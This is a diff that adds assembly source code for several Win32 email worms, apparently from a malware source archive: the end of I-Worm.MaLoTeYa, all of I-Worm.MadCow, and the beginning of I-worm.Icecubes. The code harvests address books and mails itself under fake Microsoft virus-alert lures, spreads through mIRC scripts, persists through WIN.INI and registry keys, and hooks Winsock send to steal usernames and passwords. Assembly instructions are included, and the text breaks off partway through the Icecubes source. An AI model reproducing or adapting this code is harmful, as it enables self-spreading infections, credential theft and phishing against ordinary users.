xchg eax,ecx + jecxz F3 + +d_scan_mail: + call @melto + db 'mailto:' +@melto: pop edi +scn_mail: + pushad + push 07h + pop ecx + rep cmpsb + popad + je scan_mail + inc esi + loop scn_mail + +F3: push esi + callx UnmapViewOfFile +F2: push ebp + callx CloseHandle +F1: push ebx + callx CloseHandle + popad + ret + +scan_mail: + xor edx,edx + add esi,7 ; size of the string "mailto:" + mov edi,offset m_addr + push edi +p_car: lodsb ; next character + cmp al,' ' ; space ?? + je car_s + cmp al,'"' ; end character ?? + je car_f + cmp al,'''' ; end character ?? + je car_f + cmp al,'@' ; @ character ?? + jne not_a + inc edx +not_a: stosb + jmp p_car ; jmp to nxt char +car_s: inc esi + jmp p_car +car_f: xor al,al + stosb + pop edi + test edx,edx ; exist @ ?? 
+ je d_scan_mail + call ENVOIE + jmp d_scan_mail + + +ENVOIE: xor eax,eax + push eax + push eax + push offset Message + push eax + push [MAPIh] + call [sendmail] + ret + +.data +namer db 50 dup (0) +szCopb db 50 dup (0) +szCopie db 50 dup (0) +szCurrent db 50 dup (0) +szOrig db 50 dup (0) +szSystemini db 50 dup (0) +szWinini db 50 dup (0) +Cache db 70 dup (0) +StartUp db 70 dup (0) +m_addr db 128 dup (?) +WSA_Data db 400 dup (0) +buf_recv db 512 dup (0) +Default db 0 +FileHdl dd ? +octets dd ? +netcheck dd ? +sendmail dd ? +getfolder dd ? +htmlHdl dd ? +MAPIhdl dd ? +SHELLhdl dd ? +WNEThdl dd ? +RegHdl dd ? +Dist dd 0 +Temp dd 0 +MAPIh dd 0 +WormName db "I-Worm.MaLoTeYa coded by PetiK (c)2001 (05/07)",00h +Origine db "Made In France",00h + + + +Message dd ? + dd offset sujet + dd offset corps + dd ? + dd offset date + dd ? + dd 2 ; MAPI_RECEIPT_REQUESTED ?? + dd offset MsgFrom + dd 1 ; MAPI_UNREAD ?? + dd offset MsgTo + dd 1 + dd offset AttachDesc + +MsgFrom dd ? + dd ? + dd offset NameFrom + dd offset MailFrom + dd ? + dd ? + +MsgTo dd ? + dd 1 ; MAIL_TO + dd offset NameTo + dd offset m_addr + dd ? + dd ? + +AttachDesc dd ? + dd ? + dd ? ; character in text to be replaced by attachment + dd offset szCopb ; Full path name of attachment file + dd ? + dd ? 
+ +sujet db "New Virus Alert !!",00h +corps db "This is a fix against I-Worm.Magistr.",0dh,0ah + db "Run the attached file (MSVA.EXE) to detect, repair and " + db "protect you against this malicious worm.",00h +date db "2001/07/01 15:15",00h ; YYYY/MM//DD HH:MM +NameFrom db "Microsoft Virus Alert" +MailFrom db "virus_alert@microsoft.com",00h +NameTo db "Customer",00h + +Send_M: dw fHELO-dHELO + dw fFROM-dFROM + dw fRCPT-dRCPT + dw fDATA-dDATA + dw fMAIL-dMAIL + dw fQUIT-dQUIT + + dHELO db 'HELO obelisk.mpt.com.uk',0dh,0ah + fHELO: + dFROM db 'MAIL FROM:',0dh,0ah + fFROM: + dRCPT db 'RCPT TO:',0dh,0ah + fRCPT: + dDATA db 'DATA',0dh,0ah + fDATA: + dMAIL: db 'From: "MaLoTeYa",',0dh,0ah + db 'Subject: Long Live the Worm',0dh,0ah + db 'Pays d''origine : ' + org_pays db 20 dup (0) + db '',0dh,0ah + db '.',0dh,0ah + fMAIL: + dQUIT db 'QUIT',0dh,0ah + fQUIT: + +htmd: db "Virus Alert Registration",0dh,0ah + db "",0dh,0ah + db "",0dh,0ah + db "

Microsoft Virus Alert Registration

",0dh,0ah + db "

Please fill out this form. ",0dh,0ah + db "You must be connected to internet.

",0dh,0ah + db "

",0dh,0ah + db "
",0dh,0ah + db "

Name :

",0dh,0ah + db "

Firstname :

",0dh,0ah + db "

City :

",0dh,0ah + db "

Country :

",0dh,0ah + db "

E-Mail :

",0dh,0ah + db "

",0dh,0ah + db "

",0dh,0ah + db "

AFTER REGISTRATION YOU CAN DELETE THIS FILE

",0dh,0ah + db "
",00h +HTMTAILLE equ $-htmd + +d_htm: db "",0dh,0ah,0dh,0ah + db "",0dh,0ah +HTMSIZE equ $-d_htm + +OSVERSIONINFO struct +dwOSVersionInfoSize dd ? +dwMajorVersion dd ? +dwMinorVersion dd ? +dwBuildNumber dd ? +dwPlatformId dd ? +szCSDVersion db 128 dup (?) +OSVERSIONINFO ends + +SYSTIME struct +wYear WORD ? +wMonth WORD ? +wDayOfWeek WORD ? +wDay WORD ? +wHour WORD ? +wMinute WORD ? +wSecond WORD ? +wMillisecond WORD ? +SYSTIME ends + +MAX_PATH equ 260 + +FILETIME struct +dwLowDateTime dd ? +dwHighDateTime dd ? +FILETIME ends +WIN32_FIND_DATA struct +dwFileAttributes dd ? +ftCreationTime FILETIME ? +ftLastAccessTime FILETIME ? +ftLastWriteTime FILETIME ? +nFileSizeHigh dd ? +nFileSizeLow dd ? +dwReserved0 dd ? +dwReserved1 dd ? +cFileName dd MAX_PATH (?) +cAlternateFileName db 13 dup (?) + db 3 dup (?) +WIN32_FIND_DATA ends + +OSVer OSVERSIONINFO <> +SystemTime SYSTIME <> +Search WIN32_FIND_DATA <> + +end DEBUT +end diff --git a/Win32/I-Worm.MadCow.asm b/Win32/I-Worm.MadCow.asm new file mode 100644 index 00000000..7eca41cb --- /dev/null +++ b/Win32/I-Worm.MadCow.asm 
@@ -0,0 +1,353 @@ +comment * ///// I-Worm.MadCow par PetiK ///// 25/11/2000 + +Pour assembler : tasm32 /M /ML madcow.asm + tlink32 -Tpe -aa -x madcow.obj,,,import32.lib * + +jumps +locals +.386 +.model flat,stdcall + +;KERNEL32.dll +extrn lstrcat:PROC +extrn WritePrivateProfileStringA:PROC +extrn CloseHandle:PROC +extrn CopyFileA:PROC +extrn CreateDirectoryA:PROC +extrn CreateFileA:PROC +extrn DeleteFileA:PROC +extrn ExitProcess:PROC +extrn GetModuleFileNameA:PROC +extrn GetModuleHandleA:PROC +extrn GetSystemDirectoryA:PROC +extrn GetWindowsDirectoryA:PROC +extrn MoveFileA:PROC +extrn WinExec:PROC +extrn WriteFile:PROC + +;ADVAPI32.dll +extrn RegSetValueExA:PROC +extrn RegCreateKeyExA:PROC +extrn RegCloseKey:PROC + +.data +regDisp dd 0 +regResu dd 0 +l dd 0 +p dd 0 +fh dd 0 +octets dd ? +szOrig db 260 dup (0) +szOrig2 db 260 dup (0) +szCopie db 260 dup (0) +szCopi2 db 260 dup (0) +szCico db 260 dup (0) +szWin db 260 dup (0) +Dossier db "C:\Win32",00h +fichier db "C:\Win32\Salut.ico",00h +Copico db "\MSLS.ICO",00h +Copie db "\Wininet32.exe",00h +Copie2 db "\MadCow.exe",00h +BATFILE db "C:\Win32\ENVOIE.BAT",00h +VBSFILE db "C:\Win32\ENVOIE.VBS",00h +Winini db "\\WIN.INI",00h +run db "run",00h +windows db "windows",00h +fileini db "C:\Win32\script.ini",00h +Copie3 db "C:\Win32\MadCow.exe",00h +script1 db "C:\mirc\script.ini",00h +script2 db "C:\mirc32\script.ini",00h +script3 db "C:\program files\mirc\script.ini",00h +script4 db "C:\program files\mirc32\script.ini",00h +CLE db "Software\[Atchoum]",00h +CLE2 db "\exefile\DefaultIcon",00h +Signature db "IWorm.MadCow par PetiK (c)2000" + +vbsd: +db 'DEBUT()',0dh,0ah +db 'Sub DEBUT()',0dh,0ah +db 'EMAIL()',0dh,0ah +db 'End Sub',0dh,0ah +db '',0dh,0ah +db 'Sub EMAIL()',0dh,0ah +db 'Set K = CreateObject("Outlook.Application")',0dh,0ah +db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah +db 'For Each M In L.AddressLists',0dh,0ah +db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah +db 'Set N = K.CreateItem(0)',0dh,0ah +db 'For O = 1 
To M.AddressEntries.Count',0dh,0ah +db 'Set P = M.AddressEntries(O)',0dh,0ah +db 'If O = 1 Then',0dh,0ah +db 'N.BCC = P.Address',0dh,0ah +db 'Else',0dh,0ah +db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah +db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah +db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah +db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah +db 'N.Send',0dh,0ah +db 'End If',0dh,0ah +db 'Next',0dh,0ah +db 'End Sub',0dh,0ah +vbstaille equ $-vbsd + +batd: +db '@echo off',0dh,0ah +db 'start C:\Win32\ENVOIE.VBS',0dh,0ah +battaille equ $-batd + +inid: +db "[script]",0dh,0ah +db "n0=on 1:JOIN:#:{",0dh,0ah +db "n1= /if ( $nick == $me ) { halt }",0dh,0ah +db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah +db "n3=}",00h +initaille equ $-inid + +include icone.inc + +.code +DEBUT: +VERIF: mov eax,offset CLE ; Vrifie si il existe une cl + call REG ; [Atchoum] dans HKLM\Software. 
+ cmp [regDisp],1 ; Si elle n'y est pas, + jne INIFILE ; on installe les composants + +COPIE: push 0 ; + call GetModuleHandleA ; + push 260 ; + push offset szOrig ; + push eax ; + call GetModuleFileNameA ; Copie le fichier original + push 260 ; + push offset szCopie ; + call GetSystemDirectoryA ; dans le dossier SYSTEM + push offset Copie ; + push offset szCopie ; + call lstrcat ; sous le nom de Wininet32.exe + push 00h ; + push offset szCopie ; + push offset szOrig ; + call CopyFileA ; + push 260 ; puis + push offset szCopi2 ; + call GetWindowsDirectoryA ; nouveau dans le dossier WINDOWS + push offset Copie2 ; + push offset szCopi2 ; + call lstrcat ; sous le nom de MadCow.exe + push 00h ; + push offset szCopi2 ; + push offset szOrig ; + call CopyFileA ; + +WIN_INI:push 260 ; Pour lancer le programme, on peut + push offset szWin ; + call GetWindowsDirectoryA ; utiliser la base de registre ou le + push offset Winini ; + push offset szWin ; fichier WIN.INI dans le dossier + call lstrcat ; + push offset szWin ; WINDOWS. 
La dmarche est simple : + push offset szCopie ; [windows] + push offset run ; run="nom du programme" + push offset windows ; + call WritePrivateProfileStringA ; + +DIR: push 00h ; On cre ici C:\Win32 + push offset Dossier ; + call CreateDirectoryA ; +EMAIL :push 00000000h ; On va crer C:\Win32\ENVOIE.VBS + push 00000080h ; + push 00000002h ; + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset VBSFILE ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push vbstaille ; + push offset vbsd ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; +EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT + push 00000080h ; + push 00000002h ; qui va xcuter ENVOIE.VBS + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset BATFILE ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push battaille ; + push offset batd ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + jmp EXECBAT ; + +REG: push offset regDisp ; + push offset regResu ; + push 0 ; + push 0F003Fh ; + push 0 ; + push 0 ; + push 0 ; + push eax ; Software\[Atchoum] + push 80000002h ; HKEY_LOCAL_MACHINE + call RegCreateKeyExA ; + push [regResu] ; met la valeur dans regResu + call RegCloseKey ; + ret ; + +INIFILE:push 00000000h ; On va crer dans C:\Win32 + push 00000001h ; + push 00000002h ; le fichier script.ini + push 00000000h ; + push 00000001h ; en lecture seul. 
+ push 40000000h ; + push offset fileini ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push initaille ; + push offset inid ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + + push 00h ; On va copier ce fichier dans les + push offset script1 ; rpertoire suivant : + push offset fileini ; + call CopyFileA ; C:\mirc C:\mirc32 + test eax,eax ; C:\program files\mirc et dans + jnz COPYWIN ; C:\program files\mirc32 + push 00h ; + push offset script2 ; Si il arrive se copier dans un + push offset fileini ; de ces fichier, il va crer une + call CopyFileA ; copie du programme dans C:\Win32 + test eax,eax ; le nom MadCow.exe + jnz COPYWIN ; + push 00h ; + push offset script3 ; + push offset fileini ; + call CopyFileA ; + test eax,eax ; + jnz COPYWIN ; + push 00h ; + push offset script4 ; + push offset fileini ; + call CopyFileA ; + test eax,eax ; + jz ICOFILE ; + +COPYWIN:push 0 ; + call GetModuleHandleA ; + push 260 ; + push offset szOrig2 ; + push eax ; + call GetModuleFileNameA ; Copie le fichier original + push 00h ; + push offset Copie3 ; + push offset szOrig2 ; + call CopyFileA ; + jmp FIN ; + +ICOFILE:push 00000000h ; On va crer la base du disque + push 00000080h ; + push 00000002h ; dur le fichier Salut.ico + push 00000000h ; + push 00000001h ; + push 40000000h ; + push offset fichier ; + call CreateFileA ; + mov [fh],eax ; + push 00h ; + push offset octets ; + push icotaille ; + push offset icod ; + push [fh] ; + call WriteFile ; + push [fh] ; + call CloseHandle ; + push 260 ; On dplace le fichier Salut.ico + push offset szCico ; + call GetSystemDirectoryA ; dans le dossier SYSTEM sous + push offset Copico ; + push offset szCico ; MSLS.ICO + call lstrcat ; + push offset szCico ; + push offset fichier ; + call MoveFileA ; => c'est fait + +REG2: push offset l ; + push offset p ; + push 0 ; + push 1F0000h + 1 + 2h ; + push 0 ; + push 0 ; + push 0 ; + push offset CLE2 ; Run + push 80000000h ; HKEY_CLASSES_ROOT + call 
RegCreateKeyExA ; + push 05h ; + push offset szCico ; %system%\MSLS.ico + push 01h ; + push 0 ; + push 00h ; VALEUR PAR DEFAUT + push p ; + call RegSetValueExA ; CREE UN REGISTRE + push 0 ; + call RegCloseKey ; FERME LA BASE DE REGISTRE + jmp FIN ; PUIS TERMINE LE PROGRAMME + +EXECBAT:push 01h ; On xcute le fichier ENVOIE.BAT + push offset BATFILE ; + call WinExec ; +FIN: push 00h ; FIN DU PROGRAMME + call ExitProcess ; + +end DEBUT + +************************************************************************* + +comment * + +ICONE.INC pour I-Worm.MadCow +CE FICHIER EST LA FORME HEXADECIMAL DE L'ICONE QUE L'ON VEUT CREER +* + +icod: +db 000h,000h,001h,000h,001h,000h,010h,010h,010h,000h,000h,000h,000h,000h +db 028h,001h,000h,000h,016h,000h,000h,000h,028h,000h,000h,000h,010h,000h +db 000h,000h,020h,000h,000h,000h,001h,000h,004h,000h,000h,000h,000h,000h +db 0C0h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,010h,000h +db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,080h,000h +db 000h,080h,000h,000h,000h,080h,080h,000h,080h,000h,000h,000h,080h,000h +db 080h,000h,080h,080h,000h,000h,0C0h,0C0h,0C0h,000h,080h,080h,080h,000h +db 000h,000h,0FFh,000h,000h,0FFh,000h,000h,000h,0FFh,0FFh,000h,0FFh,000h +db 000h,000h,0FFh,000h,0FFh,000h,0FFh,0FFh,000h,000h,0FFh,0FFh,0FFh,000h +db 0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh,0F0h,000h,000h,000h,000h,000h +db 000h,00Fh,0F0h,000h,000h,000h,000h,000h,000h,00Fh,0F0h,000h,000h,00Fh +db 0FFh,000h,000h,00Fh,0F0h,000h,000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h +db 000h,0F0h,000h,0F0h,000h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh +db 0F0h,000h,00Fh,000h,00Fh,00Fh,000h,00Fh,0F0h,000h,0F0h,0FFh,000h,0F0h +db 0F0h,00Fh,0F0h,000h,0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h +db 000h,00Fh,000h,00Fh,0F0h,000h,00Fh,0FFh,0FFh,0FFh,000h,00Fh,0F0h,000h +db 0F0h,000h,000h,000h,0F0h,00Fh,0F0h,000h,00Fh,000h,000h,00Fh,000h,00Fh +db 0F0h,000h,000h,000h,000h,000h,000h,00Fh,0FFh,0FFh,0FFh,0FFh,0FFh,0FFh +db 
0FFh,0FFh,000h,000h,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,07Fh,0FEh,0FFh,0FFh +db 07Eh,03Eh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Dh,0DEh,0FFh,0FFh,07Bh,0EEh +db 0FFh,0FFh,07Bh,0AEh,0FFh,0FFh,074h,0D6h,0FFh,0FFh,077h,0F6h,0FFh,0FFh +db 07Bh,0EEh,0FFh,0FFh,078h,00Eh,0FFh,0FFh,077h,0F6h,0FFh,0FFh,07Bh,0EEh +db 0FFh,0FFh,07Fh,0FEh,0FFh,0FFh,000h,000h,0FFh,0FFh +icotaille equ $-icod diff --git a/Win32/I-worm.Icecubes.asm b/Win32/I-worm.Icecubes.asm new file mode 100644 index 00000000..3f70ec2a --- /dev/null +++ b/Win32/I-worm.Icecubes.asm 
@@ -0,0 +1,4982 @@
+;****************************************************************************;
+;----------------------------------------------------------------------------;
+; I-worm.Icecubes v 1.05
+; written by f0re
+;----------------------------------------------------------------------------;
+;============================================================================;
+;
+; ABOUT
+; -----
+;
+; Welcome to the sourcecode of my first i-worm. I have given this worm its
+; name, i-worm.Icecubes, because of two reasons. First of all, here where
+; i live the summer is coming..and i like icecubes in my drinks :).
+; Secondly it is because of the joke behind the worm host code; when a user
+; receives the worm in his mailbox, the emailmessage looks like this:
+;
+; Subject: Fw: Windows Icecubes !
+;
+; ----- Original Message -----
+;
+; >Look at what I found on the web. This tool scans your system for hidden
+; >Windows settings.
+; >These settings, which are better known as the "Windows Icecubes", were
+; >built in Windows by
+; >the programmers at Microsoft and were supposed to be kept secret.
+; >
+; >Just take a look, cause I think you might want to make some changes ;).
+; >
+;
+;
+; EXECUTION
+; ---------
+;
+; When the worm is executed it will first check whether it is being executed
+; under win 95/98. If any other version of windows is found, it will skip the
+; infection procedure and run the worm-host code immediately.
+;
+; If windows 95/98 is detected it will try to locate the wsock32.dll and copy it
+; to wsock32.inf. It also copies itself to the windows system directory under
+; the name wsock2.dll. Then it will add the worm code to the .inf file by
+; increasing the size of the last section.
+; Next the worm will point the send api address in the wsock32.inf export table
+; to the virus code. 
Finally the worm drops a wininit.ini file in the windir
+; to direct windows at the next reboot to overwrite the original wsock32.dll
+; with the infected wsock32.inf.
+;
+; Then the worm will execute the worm host code; a progressbar followed by
+; funny dialog (check it out for yourself :).
+;
+;
+; SEND HOOK
+; ---------
+;
+; Once the wsock32.dll api-hook-routine receives control it will scan the send
+; buffer for usernames and or passwords. If these are found, they are stored in the
+; file \icecube.txt. If an email is being sended, the worm will extract the
+; recipient(s) emailaddress(es), the from emailaddres, the recipient(s) name(s)
+; and the from-name. Next it will base64 encode the host-worm file (wsock2.dll) and
+; prepare a new email with the encoded host attached. The body of the email contains
+; the text as shown in the ABOUT section of this description. This new email will
+; be send after the original email has been send (this is also known as the
+; happy99 technique).
+;
+;
+; THANKS
+; ------
+;
+; I'd like to thank the following persons who helped me with my many
+; questions: BlackJack, MrSandman, Spo0ky, Darkman, Benny, Prizzy,
+; urgo32, Lifewire, dageshi and T-2000. 
+;
+;
+;****************************************************************************;
+;
+; To compile:
+;
+; tasm32 icecubes.asm /ml /m
+; tlink32 -aa icecubes.obj import32.lib
+;
+; brcc32 icecubes.rc
+; brc32.exe icecubes.res
+;
+;****************************************************************************;
+
+.386
+.model flat, stdcall
+
+locals
+jumps
+ extrn ExitProcess:PROC
+ extrn DialogBoxParamA:PROC
+ extrn GetModuleHandleA:PROC
+ extrn EndDialog:PROC
+ extrn GetWindowRect:PROC
+ extrn GetDesktopWindow:PROC
+ extrn MoveWindow:PROC
+ extrn CreateThread:PROC
+ extrn SendDlgItemMessageA:PROC
+ extrn SetDlgItemTextA:PROC
+ extrn CloseHandle:PROC
+ extrn GetDlgItemTextA:PROC
+ extrn GetModuleHandleA:PROC
+ extrn GetVersion:PROC
+
+.data
+
+ Start:
+ xor ebp, ebp
+
+ CheckWindowsVersion:
+ call GetVersion
+ or eax, eax
+ jz ReturnToWormHost
+
+ MainRoutines:
+ pushad
+ call GET_GETPROCADDRESS_API_ADDRESS
+ call GET_WINDIR
+ call GET_SYSDIR
+ call INFECT_WSOCK
+ call COPY_HOST_FILE
+ popad
+
+ ReturnToWormHost:
+ jmp OriginalHost
+
+;==============================[ includes ]==================================;
+
+ include windows.inc
+ include wsocks.inc
+ include myinc.inc
+
+;=============================[ ic-data.inc ]===============================;
+
+; get_gpa.inc data
+ kernel32address dd 0BFF70000h
+ numberofnames dd ?
+ addressoffunctions dd ?
+ addressofnames dd ?
+ addressofordinals dd ?
+ AONindex dd ? 
+ AGetProcAddress db "GetProcAddress", 0
+ AGetProcAddressA dd 0
+
+; directory.inc data
+ currentdir db 100h dup(0)
+ sysdir db 100h dup(0)
+ windir db 100h dup(0)
+ AGetSystemDirectory db "GetSystemDirectoryA",0
+ AGetWindowsDirectory db "GetWindowsDirectoryA",0
+ ASetCurrentDirectory db "SetCurrentDirectoryA",0
+
+; infect_wsock.inc
+ wsock32dll db "Wsock32.dll",0
+ wsock32inf db "Wsock32.inf",0
+ ACopyFile db "CopyFileA",0
+ infectionflag db 0
+ AFindFirstFile db "FindFirstFileA",0
+ myfinddata WIN32_FIND_DATA <>
+ filesize dd 0
+ memory dd 0
+ ADeleteFile db "DeleteFileA",0
+
+; infect_file.inc
+ ASetFileAttributes db "SetFileAttributesA",0
+ ACreateFile db "CreateFileA",0
+ ACreateFileMapping db "CreateFileMappingA",0
+ AMapViewOfFile db "MapViewOfFile",0
+ filehandle dd 0
+ maphandle dd 0
+ mapaddress dd 0
+ PEheader dd 0
+ imagebase dd 0
+ imagesize dd 0
+ wnewapiaddress dd 0
+ AUnmapViewOfFile db "UnmapViewOfFile",0
+ ACloseHandle db "CloseHandle",0
+ ASetFilePointer db "SetFilePointer",0
+ ASetEndOfFile db "SetEndOfFile",0
+ ASetFileTime db "SetFileTime",0
+
+; hook_api.inc
+ woldapiaddress dd 0
+
+; rva_to_raw.inc
+ rva2raw dd 0
+
+; get_api.inc
+ user32address dd 0
+ wsock32address dd 0
+
+; create_ini_file.inc
+ inifile db "wininit.ini",0
+ writtensize dw 0
+ inicrlf db 0dh,0ah,0
+ rename db "[rename]",13,10
+ slashsign db "\",0
+ equalsign db "=",0
+ writtenbytes dd 0
+ AWriteFile db "WriteFile",0
+
+; ws_copy_host_file
+ AGetModuleFileName db "GetModuleFileNameA",0
+
+; get_bases.inc
+ ALoadLibrary db "LoadLibraryA",0
+ k32 db "KERNEL32.dll",0
+ user32 db "USER32.dll",0
+ wsock32 db "WSOCK32.dll",0
+
+; host_code.inc
+ dlgrect RECT <>
+ desktoprect RECT <>
+ dlgwidth dd 0
+ dlgheight dd 0
+ threadid dd 0
+ initflag dd 0
+ okflag dd 0
+ flag dd 0
+ pastvalue dd 0
+ currentvalue db '2',0
+ doneflag dd 0
+ value11 db "Days",0
+ value12 db "Weeks",0
+ value13 db "Months",0
+ value14 db "Years",0
+ value3 db "5000",0
+ value4 db "17",0
+
+; ic.asm
+ hInst 
dd 0
+
+; write_to_file.inc
+ passwordfile db "icecube.txt",0
+
+; ws_intercept.inc
+ socketh dd 0
+ status db 0
+ AGlobalAlloc db "GlobalAlloc",0
+ fromaddress dd 0
+ fromsize dd 0
+ rcptnumber dd 0
+ rcpt_buffer_address dd 0
+ rcpt_size_address dd 0
+ totalrcptsize dd 0
+ fromtag db 'From:',0
+ totag db 'To:',0
+ mimeendtag db '>',0
+ mimefrom_address dd 0
+ mimefromsize dd 0
+ fromstatus db 0
+ tostatus db 0
+ toendtag db 'Subject:',0
+ mimetosize dd 0
+ mimeto_address dd 0
+
+; ws_b64_encoder.inc
+ encTable db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuv'
+ db 'wxyz0123456789+/'
+; ws_attachment
+ wsock2 db "Wsock2.dll",0
+ smHnd dd 0
+ dmHnd dd 0
+ bytesread dd 0
+ encodedsize dd 0
+ AReadFile db "ReadFile",0
+ AGetFileSize db "GetFileSize",0
+
+; ws_send_mail
+ email_buffer_address dd 0
+ email_size dd 0
+ datatag db 'DATA',0dh,0ah
+ emailid db 'Message-ID: ',0dh,0ah
+ emailstart db 'Subject: Fw: Windows Icecubes !',0dh,0ah
+ db 'MIME-Version: 1.0',0dh,0ah
+ db 'Content-Type: multipart/mixed; boundary="a1234"',0dh,0ah
+ db 0dh,0ah,'--a1234',0dh,0ah
+ db 'Content-Type: text/plain; charset=us-ascii',0dh,0ah
+ db 'Content-Transfer-Encoding: 7bit',0dh,0ah,0dh,0ah
+ db 0dh,0ah
+ db '----- Original Message -----', 0dh,0ah
+ db 0dh,0ah
+ db '>Look at what I found on the web. This tool scans your system for hidden Windows settings.', 0dh, 0ah
+ db '>These settings, which are better known as the "Windows Icecubes", were built in Windows by', 0dh,0ah
+ db '>the programmers at Microsoft and were supposed to be kept secret. 
',0dh,0ah + db '>',0dh,0ah + db '>Just take a look, cause I think you might want to make some changes ;).',0dh,0ah + db '>',0dh,0ah + db 0dh,0ah + db 0dh,0ah,'--a1234',0dh,0ah + db 'Content-Type: application/octet-stream; name="Icecubes.exe"' + db 0dh,0ah,'Content-Transfer-Encoding: base64',0dh,0ah + db 'Content-Disposition: attachment; filename="Icecubes.exe"',0dh,0ah,0dh,0ah + emailend db 0dh,0ah + emailtail db 0dh,0ah,0dh,0ah,'--a1234--',0dh,0ah,0dh,0ah + endtag db 0Dh,0Ah,2Eh,0Dh,0Ah + timedate SYSTEMTIME <> + AMessageBox db "MessageBoxA",0 + AGetSystemTime db "GetSystemTime",0 + msgmessage db "Windows detected icecubes on your harddrive.",10,13 + db "This may cause the system to stop responding.",10,13 + db "Do you want Windows to remove all icecubes ?",0 + windowtitle db "I-worm.Icecubes / f0re",0 + ASend db "send",0 + ARecv db "recv",0 + recvbuffer db 100h dup(0) + +;============================[ ic-get_gpa.inc ]=============================; + +GET_GETPROCADDRESS_API_ADDRESS proc + + LoadExportTableData: + mov edi, [ebp + kernel32address] ; get exporttable + add edi, [edi + 3ch] ; address from + mov esi, [edi + 78h] ; kernel's PE header + add esi, [ebp + kernel32address] + + mov eax, dword ptr [esi + 18h] + mov [ebp + numberofnames], eax ; save number of names + + mov eax, dword ptr [esi + 1Ch] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to funtion + mov [ebp + addressoffunctions], eax ; addresses + + mov eax, dword ptr [esi + 20h] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to names + mov [ebp + addressofnames], eax ; of functions + + mov eax, dword ptr [esi + 24h] ; get ra of table with + add eax, [ebp + kernel32address] ; pointers to ordinals + mov [ebp + addressofordinals], eax ; of functions + + BeginProcAddressSearch: + mov esi, [ebp + addressofnames] ; search for GetProc + mov [ebp + AONindex], esi ; Address API in names + mov edi, [esi] ; table + add edi, [ebp + kernel32address] + xor ecx, ecx + lea 
ebx, [ebp + AGetProcAddress] + + TryAgain: + mov esi, ebx + + MatchByte: + cmpsb + jne NextOne + cmp byte ptr [esi], 0 ; did the entire string + je GotIt ; match ? + jmp MatchByte + + NextOne: + inc cx + add dword ptr [ebp + AONindex], 4 ; get next namepointer + mov esi, [ebp + AONindex] ; in table (4 dwords) + mov edi, [esi] + add edi, [ebp + kernel32address] ; align with kernelbase + jmp TryAgain + + GotIt: + shl ecx, 1 + mov esi, [ebp + addressofordinals] ; ordinal = nameindex * + add esi, ecx ; size of ordinal entry + xor eax, eax ; + ordinal table base + mov ax, word ptr [esi] + shl eax, 2 ; address of function = + mov esi, [ebp + addressoffunctions] ; ordinal * size of + add esi, eax ; entry of address + mov edi, dword ptr [esi] ; table + base of + add edi, [ebp + kernel32address] ; addresstable + mov [ebp + AGetProcAddressA], edi ; save GPA address + ret + +GET_GETPROCADDRESS_API_ADDRESS endp + +;===========================[ ic-get_bases.inc ]============================; + +GET_WSOCK32_BASE_ADDRESS proc + + LoadWsock32: + lea eax, [ebp + wsock32] ; not found, then + push eax ; load the dll + lea eax, [ebp + ALoadLibrary] ; first + call GETAPI + mov [ebp + wsock32address], eax + ret + +GET_WSOCK32_BASE_ADDRESS endp + +GET_USER32_BASE_ADDRESS proc + + GetUser32Base: + lea eax, [ebp + user32] + push eax + lea eax, [ebp + ALoadLibrary] + call GETAPI + mov [ebp + user32address], eax + ret + +GET_USER32_BASE_ADDRESS endp + +;============================[ ic-get_api.inc ]=============================; + +GETAPI proc + + push eax + push dword ptr [ebp + kernel32address] ; load kernelbase + call [ebp + AGetProcAddressA] ; and get api address + jmp eax ; call the api + ret ; return + +GETAPI endp + +GETUAPI proc + + push eax + push dword ptr [ebp + user32address] ; load wsockbase + call [ebp + AGetProcAddressA] ; and get api address + jmp eax + ret + +GETUAPI endp + +GETWAPI proc + + push eax + push dword ptr [ebp + wsock32address] ; load wsockbase + call [ebp + 
AGetProcAddressA] ; and get api address + jmp eax + ret + +GETWAPI endp + +;==========================[ ic-directory.inc ]=============================; + +GET_WINDIR proc + + GetWindowsDir: + push 128h ; size of dirstring + lea eax, [ebp + windir] ; save it here + push eax + lea eax, [ebp + AGetWindowsDirectory] ; get windowsdir + call GETAPI + ret + +GET_WINDIR endp + +GET_SYSDIR proc + + GetSystemDir: + push 128h ; size of dirstring + lea eax, [ebp + sysdir] ; save it here + push eax + lea eax, [ebp + AGetSystemDirectory] ; get system dir + call GETAPI + ret + +GET_SYSDIR endp + +SET_WINDIR proc + + SetWindowsDir: + lea eax, [ebp + windir] ; change to sysdir + push eax + lea eax, [ebp + ASetCurrentDirectory] + call GETAPI + ret + +SET_WINDIR endp + +SET_SYSDIR proc + + SetSystemDir: + lea eax, [ebp + sysdir] ; change to sysdir + push eax + lea eax, [ebp + ASetCurrentDirectory] + call GETAPI + ret + +SET_SYSDIR endp + +;=========================[ 